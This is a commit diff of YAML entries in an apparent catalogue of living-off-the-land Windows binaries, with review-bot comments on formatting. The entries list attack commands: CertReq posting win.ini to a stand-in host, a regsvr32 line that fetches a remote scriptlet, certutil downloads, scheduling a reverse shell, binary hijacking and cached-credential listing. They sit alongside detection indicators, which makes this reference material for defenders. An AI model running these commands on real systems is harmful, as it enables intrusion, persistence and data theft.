Merge branch 'master' into master
commit
1b15eccf07
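--- a/.github/workflows/yamllinting.yml
+++ b/.github/workflows/yamllinting.yml
@@ -0,0 +1,12 @@
+---
+name: Yaml Lint
+on: [push, pull_request]
+jobs:
+  lintFiles:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v1
+      - name: yaml-lint
+        uses: ibiqlik/action-yamllint@v3
+        with:
+          config_file: .yamllint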
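Review bot: Both actions in the new workflow are referenced by mutable tags (`actions/checkout@v1`, `ibiqlik/action-yamllint@v3`), so the lint job runs whatever those tags point to at the time; for a third-party action in particular, pin to a full commit SHA (with the tag in a trailing comment) so a retagged release cannot change what executes in this repository's CI. The workflow also declares no `permissions:`, so the job token gets the repository's default scopes even though linting only reads the checkout; add a top-level `permissions:` block with `contents: read` under it, between `on:` and `jobs:`. `actions/checkout@v1` is also several major versions behind and runs on a Node version the runners have deprecated; moving to the current major is a one-line change.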
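--- a/.yamllint
+++ b/.yamllint
@@ -0,0 +1,15 @@
+---
+extends: default
+yaml-files:
+  - '*.yml'
+rules:
+  new-line-at-end-of-file:
+    level: warning
+  trailing-spaces:
+    level: warning
+  line-length:
+    level: warning
+  new-lines:
+    level: warning
+  indentation:
+    level: warning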
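Review bot: Setting `yaml-files:` replaces yamllint's default list rather than extending it, so with only `- '*.yml'` any `*.yaml` file and the `.yamllint` config itself are no longer linted; either add `- '*.yaml'` and `- '.yamllint'` to the list or drop the key and keep the default. Every rule the config touches is downgraded to `level: warning`, and yamllint exits zero on warnings unless it is run in strict mode; the action as invoked in the workflow does not appear to enable that, so none of these five rules can fail the new CI job. If the intent is a soft rollout, say so in a comment above `rules:`; otherwise leave at least `indentation` and `new-lines` at `error` so the check has teeth.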
@ -34,7 +34,6 @@ Resources:
|
||||
- Link: Threatintelreport...
|
||||
Acknowledgement:
|
||||
- Person: John Doe
|
||||
Handle: @johndoe
|
||||
Handle: '@johndoe'
|
||||
- Person: Ola Norman
|
||||
Handle: @olaNor
|
||||
---
|
||||
Handle: '@olaNor'
|
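Review bot: The trailing `---` is removed from this file on the new side, while the new entries elsewhere in the commit (the CertOC and cmdl32 files) and the other touched files keep a closing `---`; if this is the entry template, as the placeholder names suggest, dropping it here means new entries copied from it will differ from the rest of the corpus. Keep the trailing `---` for consistency, or remove it everywhere in one sweep. The quoting of the `@` handles is the right fix, since a plain scalar cannot start with `@`.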
@ -14,5 +14,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/bohops/status/986984122563391488
|
||||
Notes: Thanks to Jimmy - @bohops
|
||||
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
@ -22,5 +22,6 @@ Resources:
|
||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
|
||||
- https://attack.mitre.org/wiki/Technique/T1128
|
||||
- https://twitter.com/teemuluotio/status/990532938952527873
|
||||
Notes: ''
|
||||
|
||||
Acknowledgement:
|
||||
- Person: ''
|
||||
- Handle: ''
|
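Review bot: The new acknowledgement is written as two separate sequence items, `- Person: ''` and `- Handle: ''`, which parses as two mappings rather than one person with a handle; every other entry in this commit puts `Handle:` as a sibling key of `Person:` inside a single item (for example the `- Person: Jimmy` / `Handle: '@bohops'` pair in the previous hunk). Change the second line to `Handle: ''` indented under the `Person` item. The same split-item shape appears in the `Notes: 'Thanks to '` hunk and in the Robocopy.exe hunk further down.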
@ -2,8 +2,7 @@
|
||||
Name: Nltest.exe
|
||||
Description: Credentials
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
|
||||
Description: ''
|
||||
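Review bot: On the new side `Created:` loses its quotes, so `Created: 2018-05-25` is an ISO timestamp that YAML 1.1 loaders such as PyYAML resolve to a date object instead of the string the quoted form produced; any consumer that formats or compares `Created` as text will see a type change. The commit is also inconsistent with itself here, since the aswrundll.exe hunk quotes its corrected date (`Created: '2019-03-19'`) and the new CertOC.exe and cmdl32.exe files keep quotes. Keep `Created: '2018-05-25'`; the same unquoting appears in the Robocopy, AcroRd32, Gpup, Nlnotes, Notes, Nvudisp, Nvuhda6, ROCCAT_Swarm, Setup, Usbinst, VBoxDrvInst, winword, testxlst, At, Atbroker, Bash, Bitsadmin, CertReq, Certutil, Cmd, Cmdkey, Cmstp, Control, Csc, Cscript, Dfsvc, ConfigSecurityPolicy, Desktopimgdownldr and Diantz hunks. Removing `Categories: []` is fine on its own.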
@ -14,4 +13,6 @@ Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/sysopfb/status/986799053668139009
|
||||
- https://ss64.com/nt/nltest.html
|
||||
Notes: Thanks to Sysopfb - @sysopfb
|
||||
Acknowledgement:
|
||||
- Person: Sysopfb
|
||||
Handle: '@sysopfb'
|
||||
|
@ -3,7 +3,6 @@ Name: Openwith.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: OpenWith.exe /c C:\test.hta
|
||||
Description: Opens the target file with the default application.
|
||||
@ -16,5 +15,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/harr0ey/status/991670870384021504
|
||||
Notes: Thanks to Matt harr0ey - @harr0ey
|
||||
|
||||
Acknowledgement:
|
||||
- Person: Matt harr0ey
|
||||
Handle: '@harr0ey'
|
@ -3,7 +3,6 @@ Name: Powershell.exe
|
||||
Description: Execute, Read ADS
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: powershell -ep bypass - < c:\temp:ttt
|
||||
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
|
||||
@ -14,5 +13,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/Moriarty_Meng/status/984380793383370752
|
||||
Notes: Thanks to Moriarty - @Moriarty_Meng
|
||||
|
||||
Acknowledgement:
|
||||
- Person: Moriarty
|
||||
Handle: '@Moriarty_Meng'
|
@ -18,5 +18,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
|
||||
Notes: 'Thanks to '
|
||||
|
||||
Acknowledgement:
|
||||
- Person: ''
|
||||
- Handle: ''
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Robocopy.exe
|
||||
Description: Copy
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Robocopy.exe C:\SourceFolder C:\DestFolder
|
||||
@ -16,5 +16,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
|
||||
Notes: Thanks to Name of guy - @twitterhandle
|
||||
|
||||
Acknowledgement:
|
||||
- Person: ''
|
||||
- Handle: ''
|
@ -2,8 +2,7 @@
|
||||
Name: AcroRd32.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
|
||||
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/997997818362155008
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Gpup.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
|
||||
Description: Execute another command through gpup.exe (Notepad++ binary).
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/997892519827558400
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Nlnotes.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||
Description: Run PowerShell via LotusNotes.
|
||||
@ -14,4 +13,6 @@ Detection: []
|
||||
Resources:
|
||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||
- https://twitter.com/HanseSecure/status/995578436059127808
|
||||
Notes: Thanks to Daniel Bohannon - @danielhbohannon
|
||||
Acknowledgement:
|
||||
- Person: Daniel Bohannon
|
||||
Handle: '@danielhbohannon'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Notes.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||
Description: Run PowerShell via LotusNotes.
|
||||
@ -14,4 +13,6 @@ Detection: []
|
||||
Resources:
|
||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||
- https://twitter.com/HanseSecure/status/995578436059127808
|
||||
Notes: Thanks to Daniel Bohannon - @danielhbohannon
|
||||
Acknowledgement:
|
||||
- Person: Daniel Bohannon
|
||||
Handle: '@danielhbohannon'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Nvudisp.exe
|
||||
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Nvudisp.exe System calc.exe
|
||||
Description: Execute calc.exe as a subprocess.
|
||||
@ -23,4 +22,7 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Nvuhda6.exe
|
||||
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: nvuhda6.exe System calc.exe
|
||||
Description: Execute calc.exe as a subprocess.
|
||||
@ -23,4 +22,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
|
||||
Notes: Thanks to Adam - @hexacorn
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: ROCCAT_Swarm.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
|
||||
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/994213164484001793
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -21,7 +21,7 @@ Detection:
|
||||
Resources:
|
||||
- Link: https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html
|
||||
- Link: https://twitter.com/bartblaze/status/1107390776147881984
|
||||
Acknowledgement:
|
||||
Acknowledgement:
|
||||
- Person: Bart
|
||||
Handle: @bartblaze
|
||||
Handle: '@bartblaze'
|
||||
---
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Setup.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Run Setup.exe
|
||||
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/994381620588236800
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -3,6 +3,7 @@ Name: Update.exe
|
||||
Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation.
|
||||
Author: 'Jesus Galvez'
|
||||
Created: '2020-11-01'
|
||||
Commands:
|
||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||
Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied.
|
||||
Usecase: Execute binary
|
||||
@ -14,5 +15,5 @@ Created: '2020-11-01'
|
||||
Full_Path:
|
||||
- Path: '%localappdata%\Whatsapp\Update.exe'
|
||||
Detection:
|
||||
- IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process
|
||||
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
|
||||
---
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Usbinst.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
|
||||
Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/993514357807108096
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: VBoxDrvInst.exe
|
||||
Description: Persistence
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
|
||||
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/993497996179492864
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -1,20 +1,20 @@
|
||||
Name: aswrundll.exe
|
||||
Description: This process is used by AVAST antivirus to run and execute any modules
|
||||
Author: Eli Salem
|
||||
Created: 19\03\2019
|
||||
Created: '2019-03-19'
|
||||
Commands:
|
||||
- Command: "C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"
|
||||
- Command: '"C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"'
|
||||
Description: Load and execute modules using aswrundll
|
||||
Usecase: Execute malicious modules using aswrundll.exe
|
||||
Category: Execute
|
||||
Privileges: Any
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Avast Software\Avast\aswrundll
|
||||
- Path: 'C:\Program Files\Avast Software\Avast\aswrundll'
|
||||
Code_Sample:
|
||||
- Code: ["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]
|
||||
- Code: '["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]'
|
||||
Resources:
|
||||
- Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
|
||||
Acknowledgement:
|
||||
Acknowledgement:
|
||||
- Person: Eli Salem
|
||||
handle: https://www.linkedin.com/in/eli-salem-954728150
|
||||
handle: 'https://www.linkedin.com/in/eli-salem-954728150'
|
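Review bot: The acknowledgement key is still lowercase `handle:` on the new side of the last changed line, while every other file in this commit uses `Handle:`; a consumer that reads `Handle` will silently miss this contributor, so change it to `Handle: 'https://www.linkedin.com/in/eli-salem-954728150'`. Single-quoting the `Command:`, `Path:` and `Code:` values is the right fix, since the double-quoted originals contained `\U` and `\P`, which are escape sequences in that style.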
@ -2,7 +2,7 @@
|
||||
Name: winword.exe
|
||||
Description: Document editor included with Microsoft Office.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: winword.exe /l dllfile.dll
|
||||
Description: Launch DLL payload.
|
||||
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
||||
@ -26,4 +26,4 @@ Acknowledgement:
|
||||
Handle: '@@vysecurity'
|
||||
- Person: Adam (Internals)
|
||||
Handle: '@Hexacorn'
|
||||
---
|
||||
---
|
||||
|
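Review bot: The context line `Handle: '@@vysecurity'` carries a doubled `@`, which this hunk leaves in place; it is a data error rather than a YAML one, so the linter will never flag it. Change it to `Handle: '@vysecurity'` while touching the file. The rest of the hunk appears to be a whitespace-only change to the closing `---`.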
@ -2,18 +2,18 @@
|
||||
Name: testxlst.js
|
||||
Description: Script included with Pywin32.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
||||
Categories: Execution
|
||||
Category: Execution
|
||||
Privileges: User
|
||||
MitreID: T1064
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
||||
OperatingSystem: Windows
|
||||
- Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
||||
Categories: Execution
|
||||
Category: Execution
|
||||
Privileges: User
|
||||
MitreID: T1064
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
||||
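Review bot: Renaming `Categories:` to `Category:` fixes the key, but the value `Execution` does not match the vocabulary used by the other entries in this commit, which write `Category: Execute` (the At.exe, CertOC.exe and Atbroker.exe hunks); anything grouping entries by category will put this script in a bucket of its own. Change both occurrences to `Category: Execute` if that is the canonical value. Both command items also carry identical `Description:` text, which is fine but worth a glance.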
@ -25,4 +25,6 @@ Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/bohops/status/993314069116485632
|
||||
- https://github.com/mhammond/pywin32
|
||||
Notes: Thanks to Jimmy - @bohops
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
|
@ -2,12 +2,12 @@
|
||||
Name: At.exe
|
||||
Description: Schedule periodic tasks
|
||||
Author: 'Freddie Barr-Smith'
|
||||
Created: '2019-09-20'
|
||||
Created: 2019-09-20
|
||||
Commands:
|
||||
- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
|
||||
Description: Create a recurring task to execute every day at a specific time.
|
||||
Description: Create a recurring task to execute every day at a specific time.
|
||||
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
|
||||
Category: Execute
|
||||
Category: Execute
|
||||
Privileges: Local Admin
|
||||
MitreID: T1053
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
||||
@ -17,10 +17,10 @@ Full_Path:
|
||||
- Path: C:\WINDOWS\SysWOW64\At.exe
|
||||
Detection:
|
||||
- IOC: Scheduled task is created
|
||||
- IOC: Windows event log - type 3 login
|
||||
- IOC: Windows event log - type 3 login
|
||||
- IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job)
|
||||
- IOC: C:\Windows\Tasks\At1.job
|
||||
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
||||
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
||||
Resources:
|
||||
- Link: https://freddiebarrsmith.com/at.txt
|
||||
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Atbroker.exe
|
||||
Description: Helper binary for Assistive Technology (AT)
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: ATBroker.exe /start malware
|
||||
Description: Start a registered Assistive Technology (AT).
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Atbroker.exe
|
||||
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
||||
@ -26,4 +26,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Bash.exe
|
||||
Description: File used by Windows subsystem for Linux
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: bash.exe -c calc.exe
|
||||
Description: Executes calc.exe from bash.exe
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\bash.exe
|
||||
- Path: C:\Windows\SysWOW64\bash.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from bash.exe
|
||||
@ -50,4 +50,4 @@ Acknowledgement:
|
||||
Handle: '@aionescu'
|
||||
- Person: Asif Matadar
|
||||
Handle: '@d1r4c'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Bitsadmin.exe
|
||||
Description: Used for managing background intelligent transfer
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
|
||||
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\bitsadmin.exe
|
||||
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from bitsadmin.exe
|
||||
@ -56,4 +56,4 @@ Acknowledgement:
|
||||
Handle: '@carnal0wnage'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
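--- a/yml/OSBinaries/Certoc.yml
+++ b/yml/OSBinaries/Certoc.yml
@@ -0,0 +1,28 @@
+---
+Name: CertOC.exe
+Description: Used for installing certificates
+Author: 'Ensar Samil'
+Created: '2021-10-07'
+Commands:
+  - Command: certoc.exe -LoadDLL "C:\test\calc.dll"
+    Description: Loads the target DLL file
+    Usecase: Execute code within DLL file
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows Server 2022
+Full_Path:
+  - Path: c:\windows\system32\certoc.exe
+  - Path: c:\windows\syswow64\certoc.exe
+Code_Sample:
+  - Code:
+Detection:
+  - IOC: Process creation with given parameter
+  - IOC: Unsigned DLL load via certoc.exe
+Resources:
+  - Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20
+Acknowledgement:
+  - Person: Ensar Samil
+    Handle: '@sblmsrsn'
+---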
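Review bot: `Code_Sample:` followed by `- Code:` with no value parses as a list containing one mapping whose `Code` is null, not as an empty sample list; older entries in this commit express the same thing as `Code_Sample: []`, which is unambiguous. Use `Code_Sample: []` here unless the consumer requires the placeholder item. The first detection, `Process creation with given parameter`, could name the parameter it means (`-LoadDLL`) so a detection engineer does not have to infer it from the command line above.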
@ -2,7 +2,7 @@
|
||||
Name: CertReq.exe
|
||||
Description: Used for requesting and managing certificates
|
||||
Author: 'David Middlehurst'
|
||||
Created: '2020-07-07'
|
||||
Created: 2020-07-07
|
||||
Commands:
|
||||
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
|
||||
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\certreq.exe
|
||||
- Path: C:\Windows\SysWOW64\certreq.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: certreq creates new files
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Certutil.exe
|
||||
Description: Windows binary used for handling certificates
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
||||
Description: Download and save 7zip to disk in the current folder.
|
||||
@ -44,7 +44,7 @@ Commands:
|
||||
MitreID: T1140
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
|
||||
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
|
||||
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
|
||||
Usecase: Decode files to evade defensive measures
|
||||
Category: Decode
|
||||
@ -55,7 +55,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\certutil.exe
|
||||
- Path: C:\Windows\SysWOW64\certutil.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Certutil.exe creating new files on disk
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Cmd.exe
|
||||
Description: The command-line interpreter in Windows
|
||||
Author: 'Ye Yint Min Thu Htut'
|
||||
Created: '2019-06-26'
|
||||
Created: 2019-06-26
|
||||
Commands:
|
||||
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
||||
Description: Add content to an Alternate Data Stream (ADS).
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmd.exe
|
||||
- Path: C:\Windows\SysWOW64\cmd.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: cmd.exe executing files from alternate data streams.
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Cmdkey.exe
|
||||
Name: Cmdkey.exe
|
||||
Description: creates, lists, and deletes stored user names and passwords or credentials.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cmdkey /list
|
||||
Description: List cached credentials
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmdkey.exe
|
||||
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Usage of this command could be an IOC
|
||||
@ -23,6 +23,6 @@ Resources:
